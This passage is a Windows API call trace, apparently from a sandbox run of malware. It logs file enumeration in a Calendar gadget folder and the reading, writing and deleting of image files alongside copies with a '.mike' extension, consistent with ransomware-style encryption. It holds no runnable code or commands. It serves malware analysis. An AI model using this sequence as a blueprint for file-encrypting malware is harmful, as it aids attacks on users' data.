ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x12a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_bkg_orange.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb80607de, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb80607de, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3b21e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xaa6, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendar_single_orange.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb80607de, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb80607de, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3c5297c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="corner.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f09b87, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f09b87, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3c78adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl-hot.png", cAlternateFileName="")) returned 1 [0131.280] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f2fce6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f2fce6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3c78adc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x380, dwReserved0=0x0, dwReserved1=0x0, cFileName="curl.png", cAlternateFileName="")) returned 1 [0131.281] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f2fce6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f2fce6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb40ef41c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x96, dwReserved0=0x0, dwReserved1=0x0, cFileName="month.png", cAlternateFileName="")) returned 1 [0131.281] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f2fce6, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f2fce6, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb411557c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x1f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-desk.png", cAlternateFileName="")) returned 1 [0131.281] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f55e45, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7f55e45, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb411557c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="rings-dock.png", cAlternateFileName="")) returned 1 [0131.281] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0131.288] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.288] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", lpFilePart=0x0) returned 0x56 [0131.288] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpFilePart=0x0) returned 0x51 [0131.297] WriteFile (in: hFile=0x284, lpBuffer=0x2103524*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2103524*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.298] CloseHandle (hObject=0x284) returned 1 [0131.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpFilePart=0x0) returned 0x51 [0131.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", lpFilePart=0x0) returned 0x56 [0131.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.298] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178b2be0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178b2be0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x178d8d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x8d0)) returned 1 [0131.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpFilePart=0x0) returned 0x51 [0131.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", lpFilePart=0x0) returned 0x56 [0131.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.298] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2104d34 | out: lpFileInformation=0x2104d34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178b2be0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178b2be0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x178d8d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x8d0)) returned 1 [0131.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.299] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpFilePart=0x0) returned 0x51 [0131.299] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", dwFileAttributes=0x80) returned 0 [0131.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpFilePart=0x0) returned 0x51 [0131.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", lpFilePart=0x0) returned 0x56 [0131.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.300] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178b2be0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178b2be0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x178d8d40, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x8d0)) returned 1 [0131.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png", lpFilePart=0x0) returned 0x51 [0131.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike", lpFilePart=0x0) returned 0x56 [0131.300] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-desk.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-desk.png.mike")) returned 1 [0131.301] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.301] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.301] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.301] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0131.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.303] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.303] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.303] GetFileType (hFile=0x284) returned 0x1 [0131.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.303] GetFileType (hFile=0x284) returned 0x1 [0131.303] CloseHandle (hObject=0x284) returned 1 [0131.303] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.303] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.303] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0131.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.303] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.304] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), fInfoLevelId=0x0, lpFileInformation=0x21075f0 | out: lpFileInformation=0x21075f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7160b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e7160b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x557)) returned 1 [0131.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.304] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), fInfoLevelId=0x0, lpFileInformation=0x2107930 | out: lpFileInformation=0x2107930*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7160b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e7160b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x557)) returned 1 [0131.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.304] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.304] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.305] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.305] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.305] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.305] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.305] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.305] GetFileType (hFile=0x284) returned 0x1 [0131.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.305] GetFileType (hFile=0x284) returned 0x1 [0131.305] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0131.305] WriteFile (in: hFile=0x284, lpBuffer=0x21088b4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21088b4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.306] CloseHandle (hObject=0x284) returned 1 [0131.306] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.306] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), fInfoLevelId=0x0, lpFileInformation=0x210837c | out: lpFileInformation=0x210837c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7160b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e7160b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x557)) returned 1 [0131.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.307] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.307] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.307] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.307] GetFileType (hFile=0x284) returned 0x1 [0131.307] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.307] GetFileType (hFile=0x284) returned 0x1 [0131.307] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.307] ReadFile (in: hFile=0x284, lpBuffer=0x21099f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21099f0*, lpNumberOfBytesRead=0x2af080*=0x557, lpOverlapped=0x0) returned 1 [0131.308] CloseHandle (hObject=0x284) returned 1 [0131.309] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.309] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.309] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.309] GetFileType (hFile=0x284) returned 0x1 [0131.309] SetThreadErrorMode 